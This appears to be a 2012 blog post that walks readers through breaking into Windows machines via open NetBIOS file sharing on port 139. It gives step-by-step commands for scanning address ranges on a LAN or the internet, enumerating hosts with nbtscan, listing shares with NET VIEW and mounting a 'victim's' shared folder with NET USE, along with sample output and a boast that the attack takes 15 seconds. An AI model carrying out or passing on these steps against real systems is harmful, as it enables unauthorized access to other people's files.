Thursday 12 July 2012

SYSTEM INTRUSION IN 15 SECONDS

     SYSTEM INTRUSION IN 15 SECONDS

As we all know that particular services are running at specific ports. Means upto some ports , each port is assigned particular service. For example ftp (file transfer protocol) runs on port 21 , telnet runs on port 23 and Netbios service runs on port 139.

Netbios is used for file sharing on network. That means that this can run on port 139. we can access the file by port 139.

Detail Information :

First off all you have to get the exe file of nbtscan. Once you a get copy of the exe file in C drive windows folder in system 32 folder. Then you will be able to use that at command prompt. Or you will recieve the error not internal or externel command.

Step By Step:

1:-First of all  search that port 139 is open on any computer on lan or internet.

2:- For that use any port scanner (example superscan etc). Provide a range of ip addresses to it and scan. It will give all the open ports on the particular ip address. If you have a specific IP, then use Nmap which can be downloaded off the oficial website.

See carefully which ip address has port 139 open or if using nmap if that port is open.

3:-Note/remember that ip address.

4:- Now go to Start>Run>Cmd. and click enter



Once when u get command prompt. Type the following for performing the attack:
(1) nbtscan -v < ip address>
ip address is the address of that computer which has port 139 open.
Ex. Output is shown below: OUTPUT OF COMMAND PROMPT :


Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\DON >nbtscan -v 10.1.A.76

(Note:A is any numeric value don"t get confused by it )

Doing NBT name scan for addresses from 10.1.A.76
NetBIOS Name Table for Host 10.1.A.76:
Name Service Type
----------------------------------------
BATA-SERVER <00> UNIQUE

MSHOME <00> GROUP

BATA-SERVER <03> UNIQUE

BATA-SERVER <20> UNIQUE

MSHOME <1e> GROUP

Adapter address: 00-02-44-a8-b8-77
----------------------------------------

5:-See carefully in above table in service if <20> is there then this means some files are shared on that computer.
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>. If you do not
see a hex code of <20> in the list that’s a good thing. If you do
have a hex code <20> then you may have cause for concern.

A hex code of <20> means you have file and printer sharing
turned on. This is how a “hacker” would check to see if you
have “file and printer sharing” turned on. If he/she becomes
aware of the fact that you do have “file and printer sharing”
turned on then they

6:- After this it is sure that u want to view all the shared files or folders on that computer. For that use the net command at the command prompt.

Type the following at command prompt:

NET VIEW \\ < IP ADDRESS >

This will show you all the shared files and folders on that computer.

Our potential hacker would then get a response that looks something like this.
Shared resources at \\ip_address
Sharename                       Type   Comment
MY DOCUMENTS                    Disk
TEMP                                          Disk
The command was completed successfully.

7:- Once u will get this then definetily you want to access the shared files or folders.

For that just type the following at the command prompt:

NET USE C:\\ < IP ADDRESS >\temp

8:- So you get the access of the shared files and folders on that computer. And netbios attack is performed successfully.At this point the hacker now has access to the TEMP directory of
his victim.
Q. The approximate time it takes for the average hacker to do
this attack?
A. 15 seconds or less.

1 comment: